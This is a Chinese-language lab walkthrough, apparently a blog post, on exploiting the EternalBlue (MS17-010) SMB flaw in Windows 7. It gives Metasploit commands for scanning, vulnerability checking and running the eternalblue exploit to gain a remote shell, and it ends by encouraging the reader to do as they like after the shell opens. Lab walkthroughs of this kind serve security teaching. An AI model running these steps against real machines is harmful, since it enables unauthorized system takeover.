“庖丁解牛”细说“永恒之蓝”

        永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

        SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

前提需要

攻击机:192.168.50.120 (Kali安装Metaploit工具)

靶机:192.168.50.140(windows 7靶机且关闭防火墙)

拓展:其实win7在“工作网络”模式下,打开防火墙也可以成功。默认设置为公用网络。

“庖丁解牛”细说“永恒之蓝”_第1张图片

原理

        永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

漏洞利用

1.打开kali终端窗口,扫描一下靶机是否开启了445端口以及查看版本信息

nmap -sV -p 445 192.168.50.140

得到靶机的445端口信息,以及系统版本

2.启动msfconsole ,输入search ms17-010

“庖丁解牛”细说“永恒之蓝”_第2张图片

拓展

Rank(等级),其实就是好用程度等级,排名是excellent极好的 >great很好的>good>normal正常>average平均值>low低。

Check (检查):最好用yes项的。

3.利用auxiliary模块进行漏洞验证,可以使用use 4进行验证是否存在永恒之蓝漏洞

use auxiliary/scanner/smb/smb_ms17_010

然后查看具体需要配置的东西 show options

4.设置攻击目标及端口

set rhosts 192.168.50.140

set rport 445

只设置Required列为yes的就可以。

5.配置完后使用run命令开始测试,出现第一行的内容,说明可以利用该漏洞

6.back返回,寻找攻击模块对其进行渗透,use 0

“庖丁解牛”细说“永恒之蓝”_第3张图片

开始设置相应参数,前面已演示过。

设置好后,最好show options查看一下。

拓展:

为什么选择use 0?(见前面图)

学好英文很关键,仔细阅读出真知!

exploit/windows/smb/ms17_010_eternalblue 最后的单词表示永恒之蓝,Rank为平均值,Chick为yes。

exploit/windows/smb/ms17_010_eternalblue_win8 ,用在win8系统,Chick为NO。

7.配置完输入run进行攻击,有时要多试几次,成功进入第三提示符

“庖丁解牛”细说“永恒之蓝”_第4张图片

8.查看系统信息

“庖丁解牛”细说“永恒之蓝”_第5张图片

拓展:

chcp 65001可以解决乱码!

反弹shell后,后续的事情就可以自由发挥了!!!------------------------祝你好运!!!

你可能感兴趣的:(安全,linux,网络)